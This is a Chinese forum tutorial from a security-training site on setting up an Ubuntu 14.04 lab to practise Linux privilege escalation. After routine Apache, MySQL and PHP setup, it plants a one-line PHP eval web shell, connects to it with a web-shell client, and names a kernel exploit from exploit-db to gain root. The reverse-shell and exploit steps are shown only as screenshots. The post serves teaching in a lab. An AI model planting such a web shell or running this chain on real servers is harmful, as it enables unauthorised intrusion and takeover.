linux系统ubuntu14.04.4提权实验环境搭建-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

linux系统ubuntu14.04.4提权实验环境搭建

[复制链接]
发表于 2018-9-28 21:05:11 | 显示全部楼层 |阅读模式
ubuntu14.04.4下载地址:
链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w
提取码:cuzt
1,安装apache
  1. <font size="5">  sudo apt-get update
  2.   sudo apt-get install apache2</font>
复制代码
  这时http://你机器的ip,就可以访问了。

2,安装mysql
  1. <font size="5">sudo apt-get install mysql-server php5-mysql</font>
复制代码
  安装过程中会要求你输入root用户的密码
  安装完成后执行
  1. <font size="5">sudo mysql_install_db</font>
复制代码
  这句的意思是初始化数据库目录结构
  安装完成后 mysql -u root -p
  输入密码应该是可以进入数据库的.
  指定编码创建数据库:  
  1. <font size="5">CREATE DATABASE IF NOT EXISTS yourdbname DEFAULT CHARSET utf8 COLLATE utf8_general_ci;</font>
复制代码
  从文件导入数据:
  进入指定库后,source /var/tmp/all.mysql
  导出数据:
  1. <font size="5">mysqldump -u$USER -p$PASSWD -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases mysql > db.all.sql</font>
复制代码

3,安装php及一些必要的扩展
  sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt php5-curl php5-imagick php5-cli
  如果你想找找其它扩展可以用命令:apt-cache search php5-   

4,修改默认主页
修改 /etc/apache2/mods-enabled/dir.conf
把DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm中index.php改到最前面(可以根据自已需要)
如:DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm

5,重启apache2让修改生效,并测试
  重启apache2:sudo service apache2 restart
  ubuntu14.04中apache的网站主目录是在:/var/www/html
  在此目录新建info.php文件,内容为:
  <?php
    phpinfo();
  ?>
  访问:http://你服务器ip/info.php如果显示php环境信息,测表示安装成功
6,新建站点
  在apache2的配置目录(/etc/apache2/)中有两个目录是与新建站点有关的
    sites-availables包含所有站点文件,即有启用的与非启用的
    sites-enabled包含启用了的站点,一般来说sites-enabled里的文件是sites-availables链接
  在/etc/apache2/apache2.conf文件中包含一句:IncludeOptional sites-enabled/*.conf,所以只有在sites-enabled目录中加了站点文件才会生效
  在sites-availables里添加文件test.conf
  ln -s /etc/apache2/sites-availables/test.conf /etc/apache2/sites-enabled/test.conf
7,编辑站点文件
  1. <font size="5"><VirtualHost *:80>
  2.   ServerName test.com
  3.   ServerAlias www.test.com
  4.   ServerAlias a.test.com

  5.   ServerAdmin webmaster@localhost
  6.   DocumentRoot /var/www/test
  7. </VirtualHost></font>
复制代码
本机测试添加hosts记录,即可访问。
8,进入/var/www/html/ 目录,新建一个一句话木马 one.php
  1. <?php
  2. eval($_POST[1]);
  3. ?>
复制代码

9,菜刀连接这个文件。
微信图片_20180928212758.png
10,终端执行 whoami 查看自己的权限
微信图片_20180928212929.png

11,反弹shell
微信图片_20180930133857.png

12,查看内核
  1. uname -a
复制代码
13,使用kalilinux 搜索 关于ubuntu14的漏洞 exp
https://www.exploit-db.com/exploits/37292/
  1. searchsploit ubuntu 14 -w
复制代码
2.png

14,执行提权exp
按照提示,下载,编译,执行
QQ图片20180930133909.png

提权成功!

给学生演示,安装ssh,xshell 远程连接,搭建apache环境
sudo apt-get update
sudo apt-get install openssh-server




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表